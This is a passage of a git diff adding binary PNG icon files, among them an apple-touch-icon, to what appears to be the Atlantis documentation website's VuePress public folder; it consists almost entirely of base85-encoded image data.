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

literal 0
HcmV?d00001

diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-152x152.png b/runatlantis.io/.vuepress/public/apple-touch-icon-152x152.png
new file mode 100644
index 0000000000000000000000000000000000000000..fdcae677fc9efa91b92bef51df91b8577f54828c
GIT binary patch
literal 16807
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
